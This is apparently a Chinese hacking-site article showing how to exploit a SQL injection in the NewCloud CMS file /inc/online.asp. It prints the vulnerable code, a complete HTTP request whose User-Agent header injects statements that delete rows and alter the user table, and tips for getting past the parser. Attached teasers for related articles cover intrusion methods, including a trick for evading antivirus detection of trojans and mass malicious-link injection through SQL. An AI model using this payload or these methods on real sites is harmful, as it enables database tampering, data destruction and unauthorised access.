新云网站管理系统注入漏洞代码分析 黑客如何利用成功执行sql语句?
受影响系统:最新版本
漏洞文件:/inc/online.asp
代码分析如下:
OnlineSQL = "INSERT INTO NC_Online(id,ChannelID,username,identitys,station,ip,browser,startTime,lastTime,userid,strReferer) VALUES (" & UserSessionID & "," & cid & ",'" & strUsername & "','" & stridentitys & "','" & CurrentStation & "','" & remoteaddr & "','" & BrowserType.platform&"|"&BrowserType.Browser&BrowserType.version & "|"&BrowserType.AlexaToolbar&"'," & NowString & "," & NowString & "," & userid & ",'" & strReferer & "')" //第69行
。。。。。。
Agent = Request.ServerVariables("HTTP_USER_AGENT") //第99行
。。。。。。
ElseIf Left(Agent, 5) = "Opera" Then '有此标识为浏览器 //第162行
Agent = Split(Agent, "/")
Browser = "Mozilla "
Tmpstr = Split(Agent(1), " ")
version = Tmpstr(0)
HTTP_USER_AGENT我们可以控制,则version变量我们就可以控制了。
构造数据包如下:
POST /inc/online.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://localhost/xx.htm
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Opera/haha',2008,2009,11111,'');deletefromNC_Online;update[NC_User]set[buycode]=7;--
Host: localhost
Connection: Keep-Alive
Cookie: ASPSESSIONIDAABBCRRS=FFGNDBDDKJLFADOGOMKLBGPF
成功执行sql语句
注意的地方:
1.在两次分割成数组的时候是以"/"和" ",所以构造的sql语句时使用的间隔符就不能用和空格,上面是使用tab键弄出来的空格。
2.一定要加上deletefromNC_Online,不然下次程序就不执行insert语句,而改成执行update语句了。
视频服务器有什么弱点?怎么入侵视频服务器?
视频服务器都会提供大量的视频资源,大部分都提供了在线观看以及下载服务。对于流量要求比较高,而从服务器本身的部署来看,也有一些特别之处。我们从一个入侵实例来看看视频服务器中暴露出的弱点。寻找漏洞我们
详情2018-01-25 17:08:38责编:llp 来源:驱动管家如何利用sql注入漏洞入侵dvbbs php2.0获取权限?
几 个月前,DVBBS php2 0暴了一个可以直接读出管理员密码的sql注入漏洞,当时这个漏洞出来的时候,我看的心痒,怎么还会有这么弱智的漏洞,DVBBS php2 0这套代码我还没仔细看过,于是5月中旬我down下来粗略看
详情2018-03-04 08:47:06责编:llp 来源:驱动管家网站被挂马怎么查?查询服务器是否被上传webshell的方法
服务器被挂马或被黑的朋友应该知道,黑客入侵web服务器的第一目标是往服务器上上传一个webshell,有了webshell黑客就可以干更多的事 情。网站被挂马后很多人会束手无策,无从查起,其实并不复杂,这里我将以php
详情2018-03-15 10:08:38责编:llp 来源:驱动管家木马免杀有哪些绝招?木马免杀的五大绝招
常用的木马免杀方法绝招一:快速搞定瑞星文件查杀操作步骤: 第一步:用OD载入,来到程序的入口点。 第二步:把入口点的第一句PUSH EBP 改成POP EBP 然后保存就可以躲过瑞 星的表面查杀。绝招二:快速定位
详情2018-01-07 09:11:57责编:llp 来源:驱动管家远程安全扫描器nessus有哪些优点?nessus扫描的步骤是什么?
漏洞扫描就是对计算机系统或者其它网络设备进行安全相关的检测,以找出安全隐患和可被黑客利用的漏洞。显然,漏洞扫描软件是把双刃剑,黑客利用它入侵系统,而系统管理员掌握它以后又可以有效的防范黑客入侵。因
详情2018-01-28 11:02:29责编:llp 来源:驱动管家ms挂马方法 ms如何挂马?
SQL语句如下:用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)xtype=99 ntextxtype=35 text
详情2018-03-01 10:26:01责编:llp 来源:驱动管家一些查询Linux系统的一句话脚本 如何查看谁破解你的ssh?
1、查看谁破解你的sshcat var log auth log | grep "pam_unix(sshd:auth): authentication failure; " | cut -f14 -d | cut -d& 39;=& 39; -f2 | sort | uniq -c | sort -nr2、查看当前网
详情2018-03-01 12:15:36责编:llp 来源:驱动管家绕过SQL注入限制的方法 怎么绕过select这个关键字?
突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所
详情2018-03-01 18:06:41责编:llp 来源:驱动管家注射式攻击的原理 如何绕过用户认证?
对于Web应用来说,注射式攻击由来已久,攻击方式也五花八门,常见的攻击方式有SQL注射、命令注射以及新近才出现的XPath注射等等。本文将以SQL注射为例,在源码级对其攻击原理进行深入的讲解。一、注射式攻击的原
详情2018-03-03 19:07:38责编:llp 来源:驱动管家什么是dos攻击?dos攻击有哪些方法?
DoS攻击由于攻击简单、容易达到目的、难于防止和追查越来越成为常见的攻击方式。对它的总体了解,成为有效避免,查找原因,制订对策提供有用的帮助。DoS(Denial of Service)拒绝服务攻击广义上可以指任何导致
详情2018-02-01 12:17:26责编:llp 来源:驱动管家
- BBSXP过滤函数HTMLEncode绕过过滤注射
- word艺术字在哪 Word2016艺术字制作方法
- ppt口袋动画怎么制作文字渐隐动画效果
- 技嘉GA-880GM-D2H超频好用么
- 影驰GTX560威五有什么特点
- 定速巡航无法刹车,奔驰回应称并不具备后台干预车辆技术
- “奥巴马照片”身份证就能开户盗刷?带你了解银行一二三类户
- 最新 Award Bios 设置全程图解教程
- 系统中总是多了一个软驱盘在BIOS中如何关闭软驱
- lg g2如何截屏?lg g2截屏有哪些方法?
- lg optimus g2在哪里开启usb调试?在设置里面能找到
- 网络尖兵是什么 破解网络尖兵的4种方法
- Windows系统自带得加密怎么用 Win7系统自带文件夹加密方法
- X字体服务器多个缓冲区溢出漏洞的临时解决方法是什么?
- 模拟xss wrom入侵搜狐博客?xss wrom感染流程
- Win8系统资源管理器不见了怎么办
- 怎么用EDATE函数计算员工退休时间 edate函数的使用方法
- 斯巴达克黑潮BA-218无法启动怎么办
- 微星PH67S支持风扇调速么
- 真正实现能源清洁需要多久?400年